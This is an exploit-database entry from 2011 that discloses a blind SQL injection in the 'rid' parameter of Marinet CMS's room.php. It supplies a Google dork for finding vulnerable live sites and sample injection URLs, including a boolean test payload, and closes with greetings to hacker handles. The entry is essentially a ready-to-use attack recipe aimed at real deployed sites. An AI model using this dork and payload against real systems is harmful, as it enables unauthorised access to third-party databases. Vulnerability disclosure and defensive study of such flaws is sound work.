Marinet CMS - 'room.php' Blind SQL Injection



EKU-ID: 23790 CVE: OSVDB-83881 OSVDB-ID:
Author: BHG Security Center Published: 2011-09-30 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


====================================================
MARINET CMS (room.php) <= Blind SQL Vulnerability
====================================================


# Exploit Title: MARINET CMS (room.php) <= Blind SQL Vulnerability
# Date: 30 - 09 - 2011
# Author: BHG Security Center
# Software Link: http://www.marinet.gr/
# Contact : http://black-hg.org
# Version: Final
# Google dork: inurl:room.php?rid=1 "POWERED BY MARINET"
# Tested on: Linux

[*] ## ExPLo!T:


http://localhost/room.php?rid=[SQL]

http://localhost/room.php?rid=1+and+1=0--

=================================**BHG Security
Center**==================================|
# Greets To
:                                                                             |
  Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn
~ cmaxx  |
  M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , Immortal Boy ~
farbodmahini ~ xb0y |
==========================================================================================|